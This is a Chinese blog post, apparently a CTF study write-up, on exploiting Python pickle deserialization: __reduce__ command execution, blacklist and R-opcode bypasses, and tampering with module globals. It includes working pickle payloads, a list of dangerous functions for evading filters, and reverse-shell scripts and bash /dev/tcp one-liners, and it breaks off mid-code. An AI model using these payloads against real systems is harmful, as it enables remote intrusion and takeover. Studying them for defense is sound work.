<!DOCTYPE html>
<html lang="zh-Hans">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" type="image/png" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="一个彩笔">
  <meta name="author" content="dWm2">
  <meta name="keywords" content="dWm2">
  <title>Python反序列化 ~ dWm2&#39;s Blog</title>

  <link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" href="/lib/mdbootstrap/css/mdb.min.css">
<link rel="stylesheet" href="/lib/github-markdown/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="/lib/fancybox/jquery.fancybox.min.css">


<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>


<body>
  <header style="height: 100vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>dWm2's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">ホーム</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">アーカイブ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">カテゴリー</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">タグ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">本ブログ情報　</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background"
         style="background: url('/img/2.jpg')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              
                <p class="mt-3">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>&nbsp;
                  Thursday, December 31st 2020, 12:00 am
                </p>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    2.5k 字
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      11 分钟
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>&nbsp;
                
              </p>
            
          </div>

          
            <div class="scroll-down-bar">
              <i class="fas fa-angle-down scroll-down-arrow"></i>
            </div>
          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h1 id="Python反序列化"><a href="#Python反序列化" class="headerlink" title="Python反序列化"></a>Python反序列化</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>Python 的序列化和反序列化是将一个类对象向字节流转化从而进行存储和传输，然后使用的时候再将字节流转化回原始的对象的一个过程。python序列化出来的是pickle流，这是一种栈语言。</p>
<p>pickle简介</p>
<blockquote>
<p>pickle 是一种栈语言，有不同的编写方式，基于一个轻量的 PVM（Pickle Virtual Machine）。<br>PVM 由三部分组成：<br><strong>指令处理器</strong><br>从流中读取 opcode 和参数，并对其进行解释处理。重复这个动作，直到遇到 . 这个结束符后停止。<br>最终留在栈顶的值将被作为反序列化对象返回。<br><strong>栈区stack</strong><br>由 Python 的 list 实现，被用来临时存储数据、参数以及对象。<br><strong>标签区memo</strong><br>由 Python 的 dict 实现，为 PVM 的整个生命周期提供存储。</p>
</blockquote>
<p><strong>PVM操作码</strong></p>
<p>//pickle.py</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/C:%5CUsers%5C12986%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201222154315827.png" srcset="/img/loading.gif" alt="image-20201222154315827"></p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/C:%5CUsers%5C12986%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201222154350609.png" srcset="/img/loading.gif" alt="image-20201222154350609"></p>
<p>重点关注</p>
<blockquote>
<pre><code>c：读取新的一行作为模块名module，读取下一行作为对象名object，然后将module.object压入到堆栈中。
(：将一个标记对象插入到堆栈中。为了实现我们的目的，该指令会与t搭配使用，以产生一个元组。
t：从堆栈中弹出对象，直到一个“(”被弹出，并创建一个包含弹出对象（除了“(”）的元组对象，并且这些对象的顺序必须跟它们压入堆栈时的顺序一致。然后，该元组被压入到堆栈中。
S：读取引号中的字符串直到换行符处，然后将它压入堆栈。
R：将一个元组和一个可调用对象弹出堆栈，然后以该元组作为参数调用该可调用的对象，最后将结果压入到堆栈中。
.：结束pickle。</code></pre></blockquote>
<p>几个不同类型的python反序列化例子</p>
<p>python 2、3使用的pickle协议版本不同，但却是向下兼容的，这里不再过多阐述他们之间的区别。</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p> python的pickle反序列化之所以会造成一些漏洞，是因为其内部存在一个魔术方法_ <em>reduce</em> _，其底层方法为<strong>R指令码</strong>。这个方法可以返回String和tuple类型的值，而在返回值为tuple时，就可以实现任意命令执行。</p>
<blockquote>
<p>_ <em>reduce</em> _：当序列化以及反序列化的过程中中碰到一无所知的扩展类型(这里指的就是<strong>新式类</strong>)的时候，可以通过类中定义的<strong>reduce</strong>方法来告知如何进行序列化或者反序列化</p>
</blockquote>
<p>关于新式类和旧式类：</p>
<blockquote>
<p>​    <a href="http://www.bendawang.site/2017/03/21/python%E6%B7%B1%E5%85%A5%E5%AD%A6%E4%B9%A0-%E4%B8%80-%EF%BC%9A%E7%B1%BB%E4%B8%8E%E5%85%83%E7%B1%BB%EF%BC%88metaclass%EF%BC%89%E7%9A%84%E7%90%86%E8%A7%A3/" target="_blank" rel="noopener">http://www.bendawang.site/2017/03/21/python%E6%B7%B1%E5%85%A5%E5%AD%A6%E4%B9%A0-%E4%B8%80-%EF%BC%9A%E7%B1%BB%E4%B8%8E%E5%85%83%E7%B1%BB%EF%BC%88metaclass%EF%BC%89%E7%9A%84%E7%90%86%E8%A7%A3/</a></p>
</blockquote>
<p>当返回值是一个元祖的时候（2-5个参数），第一个参数是可调用（callable）的对象，第二个是该对象所需的参数元组。在这种情况下，反序列化时会自动执行<strong>reduce</strong>里面的操作。</p>
<pre class=" language-python"><code class="language-python"><span class="token operator">//</span>python2
<span class="token keyword">import</span> pickle
<span class="token keyword">import</span> os
<span class="token keyword">class</span> <span class="token class-name">A</span><span class="token punctuation">(</span>object<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token string">'ls'</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
a <span class="token operator">=</span> A<span class="token punctuation">(</span><span class="token punctuation">)</span>
test <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>a<span class="token punctuation">)</span>
<span class="token keyword">print</span> test
pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>test<span class="token punctuation">)</span></code></pre>
<p>执行结果</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/image-20210104225654282.png" srcset="/img/loading.gif" alt="image-20210104225654282"></p>
<p>反弹shell脚本</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle
<span class="token keyword">import</span> os
<span class="token keyword">class</span> <span class="token class-name">A</span><span class="token punctuation">(</span>object<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        shell <span class="token operator">=</span> <span class="token triple-quoted-string string">"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">(</span>shell<span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>    
a<span class="token operator">=</span>A<span class="token punctuation">(</span><span class="token punctuation">)</span>
result <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>a<span class="token punctuation">)</span>
pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>result<span class="token punctuation">)</span></code></pre>
<h2 id="绕过黑名单-各种例题"><a href="#绕过黑名单-各种例题" class="headerlink" title="绕过黑名单(各种例题)"></a>绕过黑名单(各种例题)</h2><h3 id="函数黑名单"><a href="#函数黑名单" class="headerlink" title="函数黑名单"></a>函数黑名单</h3><p>2018-XCTF-HITB-WEB : Python’s-Revenge中，黑名单如下：</p>
<pre class=" language-text"><code class="language-text">black_type_list = [eval, execfile, compile, open, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.open, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.open, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.open, posixfile.fileopen]</code></pre>
<p>题解</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">class</span> <span class="token class-name">Exploit</span><span class="token punctuation">(</span>object<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
     <span class="token keyword">return</span> map<span class="token punctuation">,</span><span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">[</span><span class="token string">"ls"</span><span class="token punctuation">]</span><span class="token punctuation">)</span></code></pre>
<p>另外的解就是用platform.popen()。</p>
<p>顺便记录一下好用函数</p>
<pre class=" language-python"><code class="language-python">eval<span class="token punctuation">,</span> execfile<span class="token punctuation">,</span> compile<span class="token punctuation">,</span> open<span class="token punctuation">,</span> file<span class="token punctuation">,</span> map<span class="token punctuation">,</span> input<span class="token punctuation">,</span>
os<span class="token punctuation">.</span>system<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen2<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen3<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen4<span class="token punctuation">,</span> os<span class="token punctuation">.</span>open<span class="token punctuation">,</span> os<span class="token punctuation">.</span>pipe<span class="token punctuation">,</span>
os<span class="token punctuation">.</span>listdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>access<span class="token punctuation">,</span>
os<span class="token punctuation">.</span>execl<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execle<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execlp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execlpe<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execv<span class="token punctuation">,</span>
os<span class="token punctuation">.</span>execve<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execvp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execvpe<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnl<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnle<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnlp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnlpe<span class="token punctuation">,</span>
os<span class="token punctuation">.</span>spawnv<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnve<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnvp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnvpe<span class="token punctuation">,</span>
pickle<span class="token punctuation">.</span>load<span class="token punctuation">,</span> pickle<span class="token punctuation">.</span>loads<span class="token punctuation">,</span>cPickle<span class="token punctuation">.</span>load<span class="token punctuation">,</span>cPickle<span class="token punctuation">.</span>loads<span class="token punctuation">,</span>
subprocess<span class="token punctuation">.</span>call<span class="token punctuation">,</span>subprocess<span class="token punctuation">.</span>check_call<span class="token punctuation">,</span>subprocess<span class="token punctuation">.</span>check_output<span class="token punctuation">,</span>subprocess<span class="token punctuation">.</span>Popen<span class="token punctuation">,</span>
commands<span class="token punctuation">.</span>getstatusoutput<span class="token punctuation">,</span>commands<span class="token punctuation">.</span>getoutput<span class="token punctuation">,</span>commands<span class="token punctuation">.</span>getstatus<span class="token punctuation">,</span>
glob<span class="token punctuation">.</span>glob<span class="token punctuation">,</span>
linecache<span class="token punctuation">.</span>getline<span class="token punctuation">,</span>
shutil<span class="token punctuation">.</span>copyfileobj<span class="token punctuation">,</span>shutil<span class="token punctuation">.</span>copyfile<span class="token punctuation">,</span>shutil<span class="token punctuation">.</span>copy<span class="token punctuation">,</span>shutil<span class="token punctuation">.</span>copy2<span class="token punctuation">,</span>shutil<span class="token punctuation">.</span>move<span class="token punctuation">,</span>shutil<span class="token punctuation">.</span>make_archive<span class="token punctuation">,</span>
dircache<span class="token punctuation">.</span>listdir<span class="token punctuation">,</span>dircache<span class="token punctuation">.</span>opendir<span class="token punctuation">,</span>
io<span class="token punctuation">.</span>open<span class="token punctuation">,</span>
popen2<span class="token punctuation">.</span>popen2<span class="token punctuation">,</span>popen2<span class="token punctuation">.</span>popen3<span class="token punctuation">,</span>popen2<span class="token punctuation">.</span>popen4<span class="token punctuation">,</span>
timeit<span class="token punctuation">.</span>timeit<span class="token punctuation">,</span>timeit<span class="token punctuation">.</span>repeat<span class="token punctuation">,</span>
sys<span class="token punctuation">.</span>call_tracing<span class="token punctuation">,</span>
code<span class="token punctuation">.</span>interact<span class="token punctuation">,</span>code<span class="token punctuation">.</span>compile_command<span class="token punctuation">,</span>codeop<span class="token punctuation">.</span>compile_command<span class="token punctuation">,</span>
pty<span class="token punctuation">.</span>spawn<span class="token punctuation">,</span>
posixfile<span class="token punctuation">.</span>open<span class="token punctuation">,</span>posixfile<span class="token punctuation">.</span>fileopen<span class="token punctuation">,</span>
platform<span class="token punctuation">.</span>popen
<span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span>
map<span class="token punctuation">(</span>__import__<span class="token punctuation">(</span><span class="token string">'os'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">[</span><span class="token string">'bash -c "bash -i >&amp; /dev/tcp/127.0.0.1/12345 0&lt;&amp;1 2>&amp;1"'</span><span class="token punctuation">,</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

sys<span class="token punctuation">.</span>call_tracing<span class="token punctuation">(</span>__import__<span class="token punctuation">(</span><span class="token string">'os'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token string">'bash -c "bash -i >&amp; /dev/tcp/127.0.0.1/12345 0&lt;&amp;1 2>&amp;1"'</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

platform<span class="token punctuation">.</span>popen<span class="token punctuation">(</span><span class="token string">"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"</span><span class="token punctuation">)</span></code></pre>
<h3 id="彻底过滤R指令码"><a href="#彻底过滤R指令码" class="headerlink" title="彻底过滤R指令码"></a>彻底过滤R指令码</h3><p>c指令码</p>
<pre class=" language-python"><code class="language-python">GLOBAL         <span class="token operator">=</span> b<span class="token string">'c'</span>   <span class="token comment" spellcheck="true"># push self.find_class(modname, name); 2 string args</span></code></pre>
<p>可以看到c指令码通过引用find_class实现功能。find_class读取全局变量，并规定以\n为分割，</p>
<blockquote>
<p><code>find_class</code>(<em>module</em>, <em>name</em>)</p>
<p>如有必要，导入 <em>module</em> 模块并返回其中名叫 <em>name</em> 的对象，其中 <em>module</em> 和 <em>name</em> 参数都是 <a href="https://docs.python.org/zh-cn/3/library/stdtypes.html#str" target="_blank" rel="noopener"><code>str</code></a> 对象。注意，不要被这个函数的名字迷惑， <a href="https://docs.python.org/zh-cn/3/library/pickle.html#pickle.Unpickler.find_class" target="_blank" rel="noopener"><code>find_class()</code></a> 同样可以用来导入函数。</p>
<p>子类可以重载此方法，来控制加载对象的类型和加载对象的方式，从而尽可能降低安全风险。参阅 <a href="https://docs.python.org/zh-cn/3/library/pickle.html#pickle-restrict" target="_blank" rel="noopener">限制全局变量</a> 获取更详细的信息。</p>
<p>引发一个 <a href="https://docs.python.org/zh-cn/3/library/sys.html#auditing" target="_blank" rel="noopener">审计事件</a> <code>pickle.find_class</code> 附带参数 <code>module</code>、<code>name</code>。</p>
</blockquote>
<p>这道题就是直接过滤R，使R指令彻底不能用了。而问题是我们并不知道test.name,test.date的值。</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle
<span class="token keyword">import</span> test
<span class="token keyword">import</span> base64

<span class="token keyword">class</span> <span class="token class-name">Stu</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>name<span class="token punctuation">,</span>date<span class="token punctuation">)</span><span class="token punctuation">:</span>
        self<span class="token punctuation">.</span>name <span class="token operator">=</span> name
        self<span class="token punctuation">.</span>date <span class="token operator">=</span> date

    <span class="token keyword">def</span> <span class="token function">__eq__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>other<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> type<span class="token punctuation">(</span>other<span class="token punctuation">)</span> <span class="token operator">==</span> type<span class="token punctuation">(</span>self<span class="token punctuation">)</span> <span class="token operator">and</span> self<span class="token punctuation">.</span>name <span class="token operator">==</span> other<span class="token punctuation">.</span>name   <span class="token operator">and</span> self<span class="token punctuation">.</span>date<span class="token operator">==</span>other<span class="token punctuation">.</span>date

<span class="token comment" spellcheck="true">#a=pickle.dumps(Stu('dwm2','2021'))</span>
<span class="token comment" spellcheck="true">#print(pickletools.optimize(a))</span>

<span class="token keyword">def</span> <span class="token function">check</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>b<span class="token string">'R'</span> <span class="token keyword">in</span> data<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token string">'Hacker!!!'</span>
    x <span class="token operator">=</span> pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>data<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>x <span class="token operator">!=</span> Stu<span class="token punctuation">(</span>test<span class="token punctuation">.</span>name<span class="token punctuation">,</span>test<span class="token punctuation">.</span>date<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token string">'False!!!'</span>
    <span class="token keyword">return</span> <span class="token string">'Success!'</span>

<span class="token keyword">print</span><span class="token punctuation">(</span>check<span class="token punctuation">(</span>base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>input<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre>
<p>我们先正常输出一个序列值。</p>
<pre class=" language-python"><code class="language-python">b<span class="token string">'\x80\x03c__main__\nStu\n)\x81}(X\x04\x00\x00\x00nameX\x04\x00\x00\x00dwm2X\x04\x00\x00\x00dateX\x04\x00\x00\x002021ub.'</span></code></pre>
<p>以他为标准构造payload,将X\x04\x00\x00\x00dwm2替换为ctest\nname\n;将X\x04\x00\x00\x002021替换为ctest\ndate\n。</p>
<p>即</p>
<pre class=" language-python"><code class="language-python">b<span class="token string">'\x80\x03c__main__\nStu\n)\x81}(X\x04\x00\x00\x00namectest\nname\nX\x04\x00\x00\x00datectest\ndate\nub.'</span>
<span class="token comment" spellcheck="true">#再base64编码一下</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>base64<span class="token punctuation">.</span>b64encode<span class="token punctuation">(</span>b<span class="token string">'\x80\x03c__main__\nStu\n)\x81}(X\x04\x00\x00\x00namectest\nname\nX\x04\x00\x00\x00datectest\ndate\nub.'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">-</span>
<span class="token comment" spellcheck="true">#payload</span>
gANjX19tYWluX18KU3R1CimBfShYBAAAAG5hbWVjdGVzdApuYW1lClgEAAAAZGF0ZWN0ZXN0CmRhdGUKdWIu</code></pre>
<p>输出成功</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/image-20210105112753274.png" srcset="/img/loading.gif" alt="image-20210105112753274"></p>
<h3 id="绕过c指令module限制"><a href="#绕过c指令module限制" class="headerlink" title="绕过c指令module限制"></a>绕过<code>c</code>指令<code>module</code>限制</h3><p>上面知道c指令码通过引用find_class实现功能，而find_class是可以被重写的。如果和下面的代码一样，重写的类中只允许c指令包含<strong>main</strong>这一个module：</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> pickle
<span class="token keyword">import</span> test
<span class="token keyword">import</span> base64
<span class="token keyword">import</span> io
<span class="token keyword">import</span> sys

<span class="token keyword">class</span> <span class="token class-name">RestrictedUnpickler</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>Unpickler<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">find_class</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> module<span class="token punctuation">,</span> name<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> module <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> getattr<span class="token punctuation">(</span>sys<span class="token punctuation">.</span>modules<span class="token punctuation">[</span><span class="token string">'__main__'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> name<span class="token punctuation">)</span>
        <span class="token keyword">raise</span> pickle<span class="token punctuation">.</span>UnpicklingError<span class="token punctuation">(</span><span class="token string">"global '%s.%s' is forbidden"</span> <span class="token operator">%</span> <span class="token punctuation">(</span>module<span class="token punctuation">,</span> name<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">restricted_loads</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> RestrictedUnpickler<span class="token punctuation">(</span>io<span class="token punctuation">.</span>BytesIO<span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span>load<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token keyword">class</span> <span class="token class-name">Stu</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>name<span class="token punctuation">,</span>date<span class="token punctuation">)</span><span class="token punctuation">:</span>
        self<span class="token punctuation">.</span>name <span class="token operator">=</span> name
        self<span class="token punctuation">.</span>date <span class="token operator">=</span> date

    <span class="token keyword">def</span> <span class="token function">__eq__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>other<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> type<span class="token punctuation">(</span>other<span class="token punctuation">)</span> <span class="token operator">==</span> type<span class="token punctuation">(</span>self<span class="token punctuation">)</span> <span class="token operator">and</span> self<span class="token punctuation">.</span>name <span class="token operator">==</span> other<span class="token punctuation">.</span>name <span class="token operator">and</span> self<span class="token punctuation">.</span>date<span class="token operator">==</span>other<span class="token punctuation">.</span>date

<span class="token comment" spellcheck="true">#a=pickle.dumps(Stu('dwm2','2021'))</span>
<span class="token comment" spellcheck="true">#print(pickletools.optimize(a))</span>

<span class="token keyword">def</span> <span class="token function">check</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>b<span class="token string">'R'</span> <span class="token keyword">in</span> data<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token string">'Hacker!!!'</span>
    x <span class="token operator">=</span> pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span>data<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>x <span class="token operator">!=</span> Stu<span class="token punctuation">(</span>test<span class="token punctuation">.</span>name<span class="token punctuation">,</span>test<span class="token punctuation">.</span>date<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> <span class="token string">'False!!!'</span>
    <span class="token keyword">return</span> <span class="token string">'Success!'</span>

<span class="token keyword">print</span><span class="token punctuation">(</span>check<span class="token punctuation">(</span>base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>input<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre>
<p>这里有一个知识点：通过GLOBAL指令引入的变量，可以看作是原变量的引用。我们在栈上修改它的值，会导致原变量也被修改。</p>
<p>那我们的思路就变成了通过篡改test.py中的name和date的值以达成目标。</p>
<p>构造payload具体操作如下：</p>
<ul>
<li>引入test这个moudle:__ main __.test。命名空间在main中，不会被过滤。</li>
<li>把dict格式的数据，{‘name’:’123’,’date’:’456’}压入栈中。</li>
<li>执行BUILD命令，篡改test.name和test.date。</li>
<li>弹掉栈顶，使栈为空。</li>
<li>压入一个标准的Stu对象，它的name和date的值分别是123和456。</li>
</ul>
<p>payload</p>
<pre class=" language-python"><code class="language-python">b<span class="token string">'\x80\x03c__main__\ntest\n}(Vname\nV123\nVdate\nV456\nub0c__main__\nStu\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00123X\x04\x00\x00\x00dateX\x03\x00\x00\x00456ub.'</span></code></pre>
<p>篡改后的序列化字符串格式</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/image-20210105140019864.png" srcset="/img/loading.gif" alt="image-20210105140019864"></p>
<p>传入编码后的payload，可以看到输出success。此时test.name和test.date的值是123和456。</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/image-20210105140708010.png" srcset="/img/loading.gif" alt="image-20210105140708010"></p>
<h3 id="不用reduce的RCE方法"><a href="#不用reduce的RCE方法" class="headerlink" title="不用reduce的RCE方法"></a>不用reduce的RCE方法</h3><p>这里利用的是b指令码。b指令码用来更新对象的属性。</p>
<pre class=" language-python"><code class="language-python">    <span class="token keyword">def</span> <span class="token function">load_build</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        stack <span class="token operator">=</span> self<span class="token punctuation">.</span>stack
        state <span class="token operator">=</span> stack<span class="token punctuation">.</span>pop<span class="token punctuation">(</span><span class="token punctuation">)</span>
